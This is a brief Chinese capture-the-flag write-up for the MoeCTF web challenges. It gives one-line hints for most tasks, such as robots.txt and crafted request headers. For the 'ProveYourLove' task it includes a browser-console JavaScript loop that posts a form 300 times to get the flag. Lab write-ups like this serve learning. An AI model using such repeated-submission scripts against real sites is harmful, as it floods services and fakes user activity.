MoeCTF_WP

  1. Web渗透测试与审计入门指北
  2. 弗拉格之地的入口
  3. ez_http
  4. ProveYourLove
  5. 弗拉格之地的挑战

Web渗透测试与审计入门指北

在本地搭一个环境就可以了

弗拉格之地的入口

robots协议

ez_http

输入指示的请求头和参数即可

ProveYourLove

整个脚本在控制台自动提交300次就可以了,刷新一下就有flag了

for (let i = 0; i < 300; i++) {
    const formData = new FormData(document.getElementById('confessionForm'));

    fetch('/questionnaire', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify(Object.fromEntries(formData))
    })
    .then(response => response.json())
    .then(result => {
        if (result.success) {
            console.log('表白提交成功:', i + 1);
        } else {
            console.error('表白提交失败:', i + 1);
        }
    })
    .catch(error => {
        console.error('Error:', error);
    });
}

弗拉格之地的挑战

基础大综合